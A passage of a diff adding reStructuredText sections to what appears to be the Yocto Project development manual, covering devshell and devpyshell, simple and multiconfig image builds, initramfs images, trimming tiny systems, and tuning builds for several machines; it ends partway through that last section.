+8. *Copy the Patch File:* For simplicity, copy the patch file into a
+   directory named ``files``, which you can create in the same directory
+   that holds the recipe (``.bb``) file or the append (``.bbappend``)
+   file. Placing the patch here guarantees that the OpenEmbedded build
+   system will find the patch. Next, add the patch into the ``SRC_URI``
+   of the recipe. Here is an example:
+   ::
+
+      SRC_URI += "file://my_changes.patch"
+
+.. _platdev-appdev-devshell:
+
+Using a Development Shell
+=========================
+
+When debugging certain commands or even when just editing packages,
+``devshell`` can be a useful tool. When you invoke ``devshell``, all
+tasks up to and including
+:ref:`ref-tasks-patch` are run for the
+specified target. Then, a new terminal is opened and you are placed in
+``${``\ :term:`S`\ ``}``, the source
+directory. In the new terminal, all the OpenEmbedded build-related
+environment variables are still defined so you can use commands such as
+``configure`` and ``make``. The commands execute just as if the
+OpenEmbedded build system were executing them. Consequently, working
+this way can be helpful when debugging a build or preparing software to
+be used with the OpenEmbedded build system.
+
+Following is an example that uses ``devshell`` on a target named
+``matchbox-desktop``:
+::
+
+  $ bitbake matchbox-desktop -c devshell
+
+This command spawns a terminal with a shell prompt within the
+OpenEmbedded build environment. The
+:term:`OE_TERMINAL` variable
+controls what type of shell is opened.
+
+For spawned terminals, the following occurs:
+
+-  The ``PATH`` variable includes the cross-toolchain.
+
+-  The ``pkgconfig`` variables find the correct ``.pc`` files.
+
+-  The ``configure`` command finds the Yocto Project site files as well
+   as any other necessary files.
+
+Within this environment, you can run configure or compile commands as if
+they were being run by the OpenEmbedded build system itself. As noted
+earlier, the working directory also automatically changes to the Source
+Directory (:term:`S`).
+
+To manually run a specific task using ``devshell``, run the
+corresponding ``run.*`` script in the
+``${``\ :term:`WORKDIR`\ ``}/temp``
+directory (e.g., ``run.do_configure.``\ `pid`). If a task's script does
+not exist, which would be the case if the task was skipped by way of the
+sstate cache, you can create the task by first running it outside of the
+``devshell``:
+::
+
+   $ bitbake -c task
+
+.. note::
+
+   -  Execution of a task's ``run.*`` script and BitBake's execution of
+      a task are identical. In other words, running the script re-runs
+      the task just as it would be run using the ``bitbake -c`` command.
+
+   -  Any ``run.*`` file that does not have a ``.pid`` extension is a
+      symbolic link (symlink) to the most recent version of that file.
+
+Remember, that the ``devshell`` is a mechanism that allows you to get
+into the BitBake task execution environment. And as such, all commands
+must be called just as BitBake would call them. That means you need to
+provide the appropriate options for cross-compilation and so forth as
+applicable.
+
+When you are finished using ``devshell``, exit the shell or close the
+terminal window.
+
+.. note::
+
+   -  It is worth remembering that when using ``devshell`` you need to
+      use the full compiler name such as ``arm-poky-linux-gnueabi-gcc``
+      instead of just using ``gcc``. The same applies to other
+      applications such as ``binutils``, ``libtool`` and so forth.
+      BitBake sets up environment variables such as ``CC`` to assist
+      applications, such as ``make`` to find the correct tools.
+
+   -  It is also worth noting that ``devshell`` still works over X11
+      forwarding and similar situations.
+
+.. _platdev-appdev-devpyshell:
+
+Using a Development Python Shell
+================================
+
+Similar to working within a development shell as described in the
+previous section, you can also spawn and work within an interactive
+Python development shell. When debugging certain commands or even when
+just editing packages, ``devpyshell`` can be a useful tool. When you
+invoke ``devpyshell``, all tasks up to and including
+:ref:`ref-tasks-patch` are run for the
+specified target. Then a new terminal is opened. Additionally, key
+Python objects and code are available in the same way they are to
+BitBake tasks, in particular, the data store 'd'. So, commands such as
+the following are useful when exploring the data store and running
+functions:
+::
+
+   pydevshell> d.getVar("STAGING_DIR")
+   '/media/build1/poky/build/tmp/sysroots'
+   pydevshell> d.getVar("STAGING_DIR")
+   '${TMPDIR}/sysroots'
+   pydevshell> d.setVar("FOO", "bar")
+   pydevshell> d.getVar("FOO")
+   'bar'
+   pydevshell> d.delVar("FOO")
+   pydevshell> d.getVar("FOO")
+   pydevshell> bb.build.exec_func("do_unpack", d)
+   pydevshell>
+
+The commands execute just as if the OpenEmbedded build
+system were executing them. Consequently, working this way can be
+helpful when debugging a build or preparing software to be used with the
+OpenEmbedded build system.
+
+Following is an example that uses ``devpyshell`` on a target named
+``matchbox-desktop``:
+::
+
+   $ bitbake matchbox-desktop -c devpyshell
+
+This command spawns a terminal and places you in an interactive Python
+interpreter within the OpenEmbedded build environment. The
+:term:`OE_TERMINAL` variable
+controls what type of shell is opened.
+
+When you are finished using ``devpyshell``, you can exit the shell
+either by using Ctrl+d or closing the terminal window.
+
+.. _dev-building:
+
+Building
+========
+
+This section describes various build procedures. For example, the steps
+needed for a simple build, a target that uses multiple configurations,
+building an image for more than one machine, and so forth.
+
+.. _dev-building-a-simple-image:
+
+Building a Simple Image
+-----------------------
+
+In the development environment, you need to build an image whenever you
+change hardware support, add or change system libraries, or add or
+change services that have dependencies. Several methods exist that allow
+you to build an image within the Yocto Project. This section presents
+the basic steps you need to build a simple image using BitBake from a
+build host running Linux.
+
+.. note::
+
+   -  For information on how to build an image using
+      :term:`Toaster`, see the
+      :doc:`../toaster-manual/toaster-manual`.
+
+   -  For information on how to use ``devtool`` to build images, see the
+      ":ref:`sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow`"
+      section in the Yocto Project Application Development and the
+      Extensible Software Development Kit (eSDK) manual.
+
+   -  For a quick example on how to build an image using the
+      OpenEmbedded build system, see the
+      :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+
+The build process creates an entire Linux distribution from source and
+places it in your :term:`Build Directory` under
+``tmp/deploy/images``. For detailed information on the build process
+using BitBake, see the ":ref:`images-dev-environment`" section in the
+Yocto Project Overview and Concepts Manual.
+
+The following figure and list overviews the build process:
+
+.. image:: figures/bitbake-build-flow.png
+   :align: center
+
+1. *Set up Your Host Development System to Support Development Using the
+   Yocto Project*: See the ":doc:`dev-manual-start`" section for options on how to get a
+   build host ready to use the Yocto Project.
+
+2. *Initialize the Build Environment:* Initialize the build environment
+   by sourcing the build environment script (i.e.
+   :ref:`structure-core-script`):
+   ::
+
+      $ source oe-init-build-env [build_dir]
+
+   When you use the initialization script, the OpenEmbedded build system
+   uses ``build`` as the default :term:`Build Directory` in your current work
+   directory. You can use a `build_dir` argument with the script to
+   specify a different build directory.
+
+   .. note::
+
+      A common practice is to use a different Build Directory for
+      different targets. For example, ``~/build/x86`` for a ``qemux86``
+      target, and ``~/build/arm`` for a ``qemuarm`` target.
+
+3. *Make Sure Your* ``local.conf`` *File is Correct*: Ensure the
+   ``conf/local.conf`` configuration file, which is found in the Build
+   Directory, is set up how you want it. This file defines many aspects
+   of the build environment including the target machine architecture
+   through the ``MACHINE`` variable, the packaging format used during
+   the build
+   (:term:`PACKAGE_CLASSES`),
+   and a centralized tarball download directory through the
+   :term:`DL_DIR` variable.
+
+4. *Build the Image:* Build the image using the ``bitbake`` command:
+   ::
+
+      $ bitbake target
+
+   .. note::
+
+      For information on BitBake, see the :doc:`bitbake:index`.
+
+   The target is the name of the recipe you want to build. Common
+   targets are the images in ``meta/recipes-core/images``,
+   ``meta/recipes-sato/images``, and so forth all found in the
+   :term:`Source Directory`. Or, the target
+   can be the name of a recipe for a specific piece of software such as
+   BusyBox. For more details about the images the OpenEmbedded build
+   system supports, see the
+   ":ref:`ref-manual/ref-images:Images`" chapter in the Yocto
+   Project Reference Manual.
+
+   As an example, the following command builds the
+   ``core-image-minimal`` image:
+   ::
+
+      $ bitbake core-image-minimal
+
+   Once an
+   image has been built, it often needs to be installed. The images and
+   kernels built by the OpenEmbedded build system are placed in the
+   Build Directory in ``tmp/deploy/images``. For information on how to
+   run pre-built images such as ``qemux86`` and ``qemuarm``, see the
+   :doc:`../sdk-manual/sdk-manual` manual. For
+   information about how to install these images, see the documentation
+   for your particular board or machine.
+
+.. _dev-building-images-for-multiple-targets-using-multiple-configurations:
+
+Building Images for Multiple Targets Using Multiple Configurations
+------------------------------------------------------------------
+
+You can use a single ``bitbake`` command to build multiple images or
+packages for different targets where each image or package requires a
+different configuration (multiple configuration builds). The builds, in
+this scenario, are sometimes referred to as "multiconfigs", and this
+section uses that term throughout.
+
+This section describes how to set up for multiple configuration builds
+and how to account for cross-build dependencies between the
+multiconfigs.
+
+.. _dev-setting-up-and-running-a-multiple-configuration-build:
+
+Setting Up and Running a Multiple Configuration Build
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To accomplish a multiple configuration build, you must define each
+target's configuration separately using a parallel configuration file in
+the :term:`Build Directory` or configuration directory within a layer, and you
+must follow a required file hierarchy. Additionally, you must enable the
+multiple configuration builds in your ``local.conf`` file.
+
+Follow these steps to set up and execute multiple configuration builds:
+
+-  *Create Separate Configuration Files*: You need to create a single
+   configuration file for each build target (each multiconfig).
+   The configuration definitions are implementation dependent but often
+   each configuration file will define the machine and the
+   temporary directory BitBake uses for the build. Whether the same
+   temporary directory (:term:`TMPDIR`) can be shared will depend on what is
+   similar and what is different between the configurations. Multiple MACHINE
+   targets can share the same (:term:`TMPDIR`) as long as the rest of the
+   configuration is the same, multiple DISTRO settings would need separate
+   (:term:`TMPDIR`) directories.
+
+   For example, consider a scenario with two different multiconfigs for the same
+   :term:`MACHINE`: "qemux86" built
+   for two distributions such as "poky" and "poky-lsb". In this case,
+   you would need to use the different :term:`TMPDIR`.
+
+   Here is an example showing the minimal statements needed in a
+   configuration file for a "qemux86" target whose temporary build
+   directory is ``tmpmultix86``::
+
+      MACHINE = "qemux86"
+      TMPDIR = "${TOPDIR}/tmpmultix86"
+
+   The location for these multiconfig configuration files is specific.
+   They must reside in the current :term:`Build Directory` in a sub-directory of
+   ``conf`` named ``multiconfig`` or within a layer's ``conf`` directory
+   under a directory named ``multiconfig``. Following is an example that defines
+   two configuration files for the "x86" and "arm" multiconfigs:
+
+   .. image:: figures/multiconfig_files.png
+      :align: center
+      :width: 50%
+
+   The usual :term:`BBPATH` search path is used to locate multiconfig files in
+   a similar way to other conf files.
+
+-  *Add the BitBake Multi-configuration Variable to the Local
+   Configuration File*: Use the
+   :term:`BBMULTICONFIG`
+   variable in your ``conf/local.conf`` configuration file to specify
+   each multiconfig. Continuing with the example from the previous
+   figure, the :term:`BBMULTICONFIG` variable needs to enable two
+   multiconfigs: "x86" and "arm" by specifying each configuration file::
+
+      BBMULTICONFIG = "x86 arm"
+
+   .. note::
+
+      A "default" configuration already exists by definition. This
+      configuration is named: "" (i.e. empty string) and is defined by
+      the variables coming from your ``local.conf``
+      file. Consequently, the previous example actually adds two
+      additional configurations to your build: "arm" and "x86" along
+      with "".
+
+-  *Launch BitBake*: Use the following BitBake command form to launch
+   the multiple configuration build::
+
+      $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ]
+
+   For the example in this section, the following command applies::
+
+      $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base
+
+   The previous BitBake command builds a ``core-image-minimal`` image
+   that is configured through the ``x86.conf`` configuration file, a
+   ``core-image-sato`` image that is configured through the ``arm.conf``
+   configuration file and a ``core-image-base`` that is configured
+   through your ``local.conf`` configuration file.
+
+.. note::
+
+   Support for multiple configuration builds in the Yocto Project &DISTRO;
+   (&DISTRO_NAME;) Release does not include Shared State (sstate)
+   optimizations. Consequently, if a build uses the same object twice
+   in, for example, two different :term:`TMPDIR`
+   directories, the build either loads from an existing sstate cache for
+   that build at the start or builds the object fresh.
+
+.. _dev-enabling-multiple-configuration-build-dependencies:
+
+Enabling Multiple Configuration Build Dependencies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Sometimes dependencies can exist between targets (multiconfigs) in a
+multiple configuration build. For example, suppose that in order to
+build a ``core-image-sato`` image for an "x86" multiconfig, the root
+filesystem of an "arm" multiconfig must exist. This dependency is
+essentially that the
+:ref:`ref-tasks-image` task in the
+``core-image-sato`` recipe depends on the completion of the
+:ref:`ref-tasks-rootfs` task of the
+``core-image-minimal`` recipe.
+
+To enable dependencies in a multiple configuration build, you must
+declare the dependencies in the recipe using the following statement
+form::
+
+   task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend"
+
+To better show how to use this statement, consider the example scenario
+from the first paragraph of this section. The following statement needs
+to be added to the recipe that builds the ``core-image-sato`` image::
+
+   do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs"
+
+In this example, the `from_multiconfig` is "x86". The `to_multiconfig` is "arm". The
+task on which the :ref:`ref-tasks-image` task in the recipe depends is the
+:ref:`ref-tasks-rootfs` task from the ``core-image-minimal`` recipe associated
+with the "arm" multiconfig.
+
+Once you set up this dependency, you can build the "x86" multiconfig
+using a BitBake command as follows::
+
+   $ bitbake mc:x86:core-image-sato
+
+This command executes all the tasks needed to create the
+``core-image-sato`` image for the "x86" multiconfig. Because of the
+dependency, BitBake also executes through the :ref:`ref-tasks-rootfs` task for the
+"arm" multiconfig build.
+
+Having a recipe depend on the root filesystem of another build might not
+seem that useful. Consider this change to the statement in the
+``core-image-sato`` recipe::
+
+   do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image"
+
+In this case, BitBake must
+create the ``core-image-minimal`` image for the "arm" build since the
+"x86" build depends on it.
+
+Because "x86" and "arm" are enabled for multiple configuration builds
+and have separate configuration files, BitBake places the artifacts for
+each build in the respective temporary build directories (i.e.
+:term:`TMPDIR`).
+
+.. _building-an-initramfs-image:
+
+Building an Initial RAM Filesystem (initramfs) Image
+----------------------------------------------------
+
+An initial RAM filesystem (initramfs) image provides a temporary root
+filesystem used for early system initialization (e.g. loading of modules
+needed to locate and mount the "real" root filesystem).
+
+.. note::
+
+   The initramfs image is the successor of initial RAM disk (initrd). It
+   is a "copy in and out" (cpio) archive of the initial filesystem that
+   gets loaded into memory during the Linux startup process. Because
+   Linux uses the contents of the archive during initialization, the
+   initramfs image needs to contain all of the device drivers and tools
+   needed to mount the final root filesystem.
+
+Follow these steps to create an initramfs image:
+
+1. *Create the initramfs Image Recipe:* You can reference the
+   ``core-image-minimal-initramfs.bb`` recipe found in the
+   ``meta/recipes-core`` directory of the :term:`Source Directory`
+   as an example
+   from which to work.
+
+2. *Decide if You Need to Bundle the initramfs Image Into the Kernel
+   Image:* If you want the initramfs image that is built to be bundled
+   in with the kernel image, set the
+   :term:`INITRAMFS_IMAGE_BUNDLE`
+   variable to "1" in your ``local.conf`` configuration file and set the
+   :term:`INITRAMFS_IMAGE`
+   variable in the recipe that builds the kernel image.
+
+   .. note::
+
+      It is recommended that you do bundle the initramfs image with the
+      kernel image to avoid circular dependencies between the kernel
+      recipe and the initramfs recipe should the initramfs image include
+      kernel modules.
+
+   Setting the ``INITRAMFS_IMAGE_BUNDLE`` flag causes the initramfs
+   image to be unpacked into the ``${B}/usr/`` directory. The unpacked
+   initramfs image is then passed to the kernel's ``Makefile`` using the
+   :term:`CONFIG_INITRAMFS_SOURCE`
+   variable, allowing the initramfs image to be built into the kernel
+   normally.
+
+   .. note::
+
+      If you choose to not bundle the initramfs image with the kernel
+      image, you are essentially using an
+      `Initial RAM Disk (initrd) <https://en.wikipedia.org/wiki/Initrd>`__.
+      Creating an initrd is handled primarily through the :term:`INITRD_IMAGE`,
+      ``INITRD_LIVE``, and ``INITRD_IMAGE_LIVE`` variables. For more
+      information, see the :ref:`ref-classes-image-live` file.
+
+3. *Optionally Add Items to the initramfs Image Through the initramfs
+   Image Recipe:* If you add items to the initramfs image by way of its
+   recipe, you should use
+   :term:`PACKAGE_INSTALL`
+   rather than
+   :term:`IMAGE_INSTALL`.
+   ``PACKAGE_INSTALL`` gives more direct control of what is added to the
+   image as compared to the defaults you might not necessarily want that
+   are set by the :ref:`image <ref-classes-image>`
+   or :ref:`core-image <ref-classes-core-image>`
+   classes.
+
+4. *Build the Kernel Image and the initramfs Image:* Build your kernel
+   image using BitBake. Because the initramfs image recipe is a
+   dependency of the kernel image, the initramfs image is built as well
+   and bundled with the kernel image if you used the
+   :term:`INITRAMFS_IMAGE_BUNDLE`
+   variable described earlier.
+
+Building a Tiny System
+----------------------
+
+Very small distributions have some significant advantages such as
+requiring less on-die or in-package memory (cheaper), better performance
+through efficient cache usage, lower power requirements due to less
+memory, faster boot times, and reduced development overhead. Some
+real-world examples where a very small distribution gives you distinct
+advantages are digital cameras, medical devices, and small headless
+systems.
+
+This section presents information that shows you how you can trim your
+distribution to even smaller sizes than the ``poky-tiny`` distribution,
+which is around 5 Mbytes, that can be built out-of-the-box using the
+Yocto Project.
+
+.. _tiny-system-overview:
+
+Tiny System Overview
+~~~~~~~~~~~~~~~~~~~~
+
+The following list presents the overall steps you need to consider and
+perform to create distributions with smaller root filesystems, achieve
+faster boot times, maintain your critical functionality, and avoid
+initial RAM disks:
+
+-  `Determine your goals and guiding
+   principles. <#goals-and-guiding-principles>`__
+
+-  `Understand what contributes to your image
+   size. <#understand-what-gives-your-image-size>`__
+
+-  `Reduce the size of the root
+   filesystem. <#trim-the-root-filesystem>`__
+
+-  `Reduce the size of the kernel. <#trim-the-kernel>`__
+
+-  `Eliminate packaging
+   requirements. <#remove-package-management-requirements>`__
+
+-  `Look for other ways to minimize
+   size. <#look-for-other-ways-to-minimize-size>`__
+
+-  `Iterate on the process. <#iterate-on-the-process>`__
+
+Goals and Guiding Principles
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Before you can reach your destination, you need to know where you are
+going. Here is an example list that you can use as a guide when creating
+very small distributions:
+
+-  Determine how much space you need (e.g. a kernel that is 1 Mbyte or
+   less and a root filesystem that is 3 Mbytes or less).
+
+-  Find the areas that are currently taking 90% of the space and
+   concentrate on reducing those areas.
+
+-  Do not create any difficult "hacks" to achieve your goals.
+
+-  Leverage the device-specific options.
+
+-  Work in a separate layer so that you keep changes isolated. For
+   information on how to create layers, see the "`Understanding and
+   Creating Layers <#understanding-and-creating-layers>`__" section.
+
+.. _understand-what-gives-your-image-size:
+
+Understand What Contributes to Your Image Size
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It is easiest to have something to start with when creating your own
+distribution. You can use the Yocto Project out-of-the-box to create the
+``poky-tiny`` distribution. Ultimately, you will want to make changes in
+your own distribution that are likely modeled after ``poky-tiny``.
+
+.. note::
+
+   To use ``poky-tiny`` in your build, set the ``DISTRO`` variable in your
+   ``local.conf`` file to "poky-tiny" as described in the
+   ":ref:`dev-manual/dev-manual-common-tasks:creating your own distribution`"
+   section.
+
+Understanding some memory concepts will help you reduce the system size.
+Memory consists of static, dynamic, and temporary memory. Static memory
+is the TEXT (code), DATA (initialized data in the code), and BSS
+(uninitialized data) sections. Dynamic memory represents memory that is
+allocated at runtime: stacks, hash tables, and so forth. Temporary
+memory is recovered after the boot process. This memory consists of
+memory used for decompressing the kernel and for the ``__init__``
+functions.
+
+To help you see where you currently are with kernel and root filesystem
+sizes, you can use two tools found in the :term:`Source Directory`
+in the
+``scripts/tiny/`` directory:
+
+-  ``ksize.py``: Reports component sizes for the kernel build objects.
+
+-  ``dirsize.py``: Reports component sizes for the root filesystem.
+
+This next tool and command help you organize configuration fragments and
+view file dependencies in a human-readable form:
+
+-  ``merge_config.sh``: Helps you manage configuration files and
+   fragments within the kernel. With this tool, you can merge individual
+   configuration fragments together. The tool allows you to make
+   overrides and warns you of any missing configuration options. The
+   tool is ideal for allowing you to iterate on configurations, create
+   minimal configurations, and create configuration files for different
+   machines without having to duplicate your process.
+
+   The ``merge_config.sh`` script is part of the Linux Yocto kernel Git
+   repositories (i.e. ``linux-yocto-3.14``, ``linux-yocto-3.10``,
+   ``linux-yocto-3.8``, and so forth) in the ``scripts/kconfig``
+   directory.
+
+   For more information on configuration fragments, see the
+   ":ref:`creating-config-fragments`"
+   section in the Yocto Project Linux Kernel Development Manual.
+
+-  ``bitbake -u taskexp -g bitbake_target``: Using the BitBake command
+   with these options brings up a Dependency Explorer from which you can
+   view file dependencies. Understanding these dependencies allows you
+   to make informed decisions when cutting out various pieces of the
+   kernel and root filesystem.
+
+Trim the Root Filesystem
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The root filesystem is made up of packages for booting, libraries, and
+applications. To change things, you can configure how the packaging
+happens, which changes the way you build them. You can also modify the
+filesystem itself or select a different filesystem.
+
+First, find out what is hogging your root filesystem by running the
+``dirsize.py`` script from your root directory:
+::
+
+   $ cd root-directory-of-image
+   $ dirsize.py 100000 > dirsize-100k.log
+   $ cat dirsize-100k.log
+
+You can apply a filter to the script to ignore files
+under a certain size. The previous example filters out any files below
+100 Kbytes. The sizes reported by the tool are uncompressed, and thus
+will be smaller by a relatively constant factor in a compressed root
+filesystem. When you examine your log file, you can focus on areas of
+the root filesystem that take up large amounts of memory.
+
+You need to be sure that what you eliminate does not cripple the
+functionality you need. One way to see how packages relate to each other
+is by using the Dependency Explorer UI with the BitBake command:
+::
+
+   $ cd image-directory
+   $ bitbake -u taskexp -g image
+
+Use the interface to
+select potential packages you wish to eliminate and see their dependency
+relationships.
+
+When deciding how to reduce the size, get rid of packages that result in
+minimal impact on the feature set. For example, you might not need a VGA
+display. Or, you might be able to get by with ``devtmpfs`` and ``mdev``
+instead of ``udev``.
+
+Use your ``local.conf`` file to make changes. For example, to eliminate
+``udev`` and ``glib``, set the following in the local configuration
+file:
+::
+
+   VIRTUAL-RUNTIME_dev_manager = ""
+
+Finally, you should consider exactly the type of root filesystem you
+need to meet your needs while also reducing its size. For example,
+consider ``cramfs``, ``squashfs``, ``ubifs``, ``ext2``, or an
+``initramfs`` using ``initramfs``. Be aware that ``ext3`` requires a 1
+Mbyte journal. If you are okay with running read-only, you do not need
+this journal.
+
+.. note::
+
+   After each round of elimination, you need to rebuild your system and
+   then use the tools to see the effects of your reductions.
+
+Trim the Kernel
+~~~~~~~~~~~~~~~
+
+The kernel is built by including policies for hardware-independent
+aspects. What subsystems do you enable? For what architecture are you
+building? Which drivers do you build by default?
+
+.. note::
+
+   You can modify the kernel source if you want to help with boot time.
+
+Run the ``ksize.py`` script from the top-level Linux build directory to
+get an idea of what is making up the kernel:
+::
+
+   $ cd top-level-linux-build-directory
+   $ ksize.py > ksize.log
+   $ cat ksize.log
+
+When you examine the log, you will see how much space is taken up with
+the built-in ``.o`` files for drivers, networking, core kernel files,
+filesystem, sound, and so forth. The sizes reported by the tool are
+uncompressed, and thus will be smaller by a relatively constant factor
+in a compressed kernel image. Look to reduce the areas that are large
+and taking up around the "90% rule."
+
+To examine, or drill down, into any particular area, use the ``-d``
+option with the script:
+::
+
+   $ ksize.py -d > ksize.log
+
+Using this option
+breaks out the individual file information for each area of the kernel
+(e.g. drivers, networking, and so forth).
+
+Use your log file to see what you can eliminate from the kernel based on
+features you can let go. For example, if you are not going to need
+sound, you do not need any drivers that support sound.
+
+After figuring out what to eliminate, you need to reconfigure the kernel
+to reflect those changes during the next build. You could run
+``menuconfig`` and make all your changes at once. However, that makes it
+difficult to see the effects of your individual eliminations and also
+makes it difficult to replicate the changes for perhaps another target
+device. A better method is to start with no configurations using
+``allnoconfig``, create configuration fragments for individual changes,
+and then manage the fragments into a single configuration file using
+``merge_config.sh``. The tool makes it easy for you to iterate using the
+configuration change and build cycle.
+
+Each time you make configuration changes, you need to rebuild the kernel
+and check to see what impact your changes had on the overall size.
+
+Remove Package Management Requirements
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Packaging requirements add size to the image. One way to reduce the size
+of the image is to remove all the packaging requirements from the image.
+This reduction includes both removing the package manager and its unique
+dependencies as well as removing the package management data itself.
+
+To eliminate all the packaging requirements for an image, be sure that
+"package-management" is not part of your
+:term:`IMAGE_FEATURES`
+statement for the image. When you remove this feature, you are removing
+the package manager as well as its dependencies from the root
+filesystem.
+
+Look for Other Ways to Minimize Size
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Depending on your particular circumstances, other areas that you can
+trim likely exist. The key to finding these areas is through tools and
+methods described here combined with experimentation and iteration. Here
+are a couple of areas to experiment with:
+
+-  ``glibc``: In general, follow this process:
+
+   1. Remove ``glibc`` features from
+      :term:`DISTRO_FEATURES`
+      that you think you do not need.
+
+   2. Build your distribution.
+
+   3. If the build fails due to missing symbols in a package, determine
+      if you can reconfigure the package to not need those features. For
+      example, change the configuration to not support wide character
+      support as is done for ``ncurses``. Or, if support for those
+      characters is needed, determine what ``glibc`` features provide
+      the support and restore the configuration.
+
+   4. Rebuild and repeat the process.
+
+-  ``busybox``: For BusyBox, use a process similar as described for
+   ``glibc``. A difference is you will need to boot the resulting system
+   to see if you are able to do everything you expect from the running
+   system. You need to be sure to integrate configuration fragments into
+   Busybox because BusyBox handles its own core features and then allows
+   you to add configuration fragments on top.
+
+Iterate on the Process
+~~~~~~~~~~~~~~~~~~~~~~
+
+If you have not reached your goals on system size, you need to iterate
+on the process. The process is the same. Use the tools and see just what
+is taking up 90% of the root filesystem and the kernel. Decide what you
+can eliminate without limiting your device beyond what you need.
+
+Depending on your system, a good place to look might be Busybox, which
+provides a stripped down version of Unix tools in a single, executable
+file. You might be able to drop virtual terminal services or perhaps
+ipv6.
+
+Building Images for More than One Machine
+-----------------------------------------
+
+A common scenario developers face is creating images for several
+different machines that use the same software environment. In this
+situation, it is tempting to set the tunings and optimization flags for
+each build specifically for the targeted hardware (i.e. "maxing out" the
+tunings). Doing so can considerably add to build times and package feed
+maintenance collectively for the machines. For example, selecting tunes
+that are extremely specific to a CPU core used in a system might enable
+some micro optimizations in GCC for that particular system but would
+otherwise not gain you much of a performance difference across the other
+systems as compared to using a more general tuning across all the builds
+(e.g. setting :term:`DEFAULTTUNE`
+specifically for each machine's build). Rather than "max out" each
+build's tunings, you can take steps that cause the OpenEmbedded build
+system to reuse software across the various machines where it makes
+sense.
+
+If build speed and package feed maintenance are considerations, you
+should consider the points in this section that can help you optimize
+your tunings to best consider build times and package feed maintenance.
+
+-  *Share the Build Directory:* If at all possible, share the
+   :term:`TMPDIR` across builds. The
+   Yocto Project supports switching between different
+   :term:`MACHINE` values in the same
+   ``TMPDIR``. This practice is well supported and regularly used by
+   developers when building for multiple machines. When you use the same
+   ``TMPDIR`` for multiple machine builds, the OpenEmbedded build system
+   can reuse the existing native and often cross-recipes for multiple
+   machines. Thus, build time decreases.
+
+   .. note::
+
+      If :term:`DISTRO` settings change or fundamental configuration settings
+      such as the filesystem layout, you need to work with a clean ``TMPDIR``.
+      Sharing ``TMPDIR`` under these circumstances might work but since it is
+      not guaranteed, you should use a clean ``TMPDIR``.
+
+-  *Enable the Appropriate Package Architecture:* By default, the
+   OpenEmbedded build system enables three levels of package
+   architectures: "all", "tune" or "package", and "machine". Any given
+   recipe usually selects one of these package architectures (types) for
+   its output. Depending for what a given recipe creates packages,
+   making sure you enable the appropriate package architecture can
+   directly impact the build time.
+
+   A recipe that just generates scripts can enable "all" architecture
+   because there are no binaries to build. To specifically enable "all"
+   architecture, be sure your recipe inherits the
+   :ref:`allarch <ref-classes-allarch>` class.
+   This class is useful for "all" architectures because it configures
+   many variables so packages can be used across multiple architectures.
+
+   If your recipe needs to generate packages that are machine-specific
+   or when one of the build or runtime dependencies is already
+   machine-architecture dependent, which makes your recipe also
+   machine-architecture dependent, make sure your recipe enables the
+   "machine" package architecture through the
+   :term:`MACHINE_ARCH`
+   variable:
+   ::
+
+      PACKAGE_ARCH = "${MACHINE_ARCH}"
+
+   When you do not
+   specifically enable a package architecture through the
+   :term:`PACKAGE_ARCH`, The
+   OpenEmbedded build system defaults to the
+   :term:`TUNE_PKGARCH` setting:
+   ::
+
+      PACKAGE_ARCH = "${TUNE_PKGARCH}"
+
+-  *Choose a Generic Tuning File if Possible:* Some tunes are more
+   generic and can run on multiple targets (e.g. an ``armv5`` set of
+   packages could run on ``armv6`` and ``armv7`` processors in most
+   cases). Similarly, ``i486`` binaries could work on ``i586`` and
+   higher processors. You should realize, however, that advances on
+   newer processor versions would not be used.
+
+   If you select the same tune for several different machines, the
+   OpenEmbedded build system reuses software previously built, thus
+   speeding up the overall build time. Realize that even though a new
+   sysroot for each machine is generated, the software is not recompiled
+   and only one package feed exists.
+
+-  *Manage Granular Level Packaging:* Sometimes cases exist where
+   injecting another level of package architecture beyond the three
+   higher levels noted earlier can be useful. For example, consider how
+   NXP (formerly Freescale) allows for the easy reuse of binary packages
+   in their layer
+   :yocto_git:`meta-freescale </cgit/cgit.cgi/meta-freescale/>`.
+   In this example, the
+   :yocto_git:`fsl-dynamic-packagearch </cgit/cgit.cgi/meta-freescale/tree/classes/fsl-dynamic-packagearch.bbclass>`
+   class shares GPU packages for i.MX53 boards because all boards share
+   the AMD GPU. The i.MX6-based boards can do the same because all
+   boards share the Vivante GPU. This class inspects the BitBake
+   datastore to identify if the package provides or depends on one of
+   the sub-architecture values. If so, the class sets the
+   :term:`PACKAGE_ARCH` value
+   based on the ``MACHINE_SUBARCH`` value. If the package does not
+   provide or depend on one of the sub-architecture values but it
+   matches a value in the machine-specific filter, it sets
+   :term:`MACHINE_ARCH`. This
+   behavior reduces the number of packages built and saves build time by
+   reusing binaries.
+
+-  *Use Tools to Debug Issues:* Sometimes you can run into situations
+   where software is being rebuilt when you think it should not be. For
+   example, the OpenEmbedded build system might not be using shared
+   state between machines when you think it should be. These types of
+   situations are usually due to references to machine-specific
+   variables such as :term:`MACHINE`,
+   :term:`SERIAL_CONSOLES`,
+   :term:`XSERVER`,
+   :term:`MACHINE_FEATURES`,
+   and so forth in code that is supposed to only be tune-specific or
+   when the recipe depends
+   (:term:`DEPENDS`,
+   :term:`RDEPENDS`,
+   :term:`RRECOMMENDS`,
+   :term:`RSUGGESTS`, and so forth)
+   on some other recipe that already has
+   :term:`PACKAGE_ARCH` defined
+   as "${MACHINE_ARCH}".
+
+   .. note::
+
+      Patches to fix any issues identified are most welcome as these
+      issues occasionally do occur.
+
+   For such cases, you can use some tools to help you sort out the
+   situation:
+
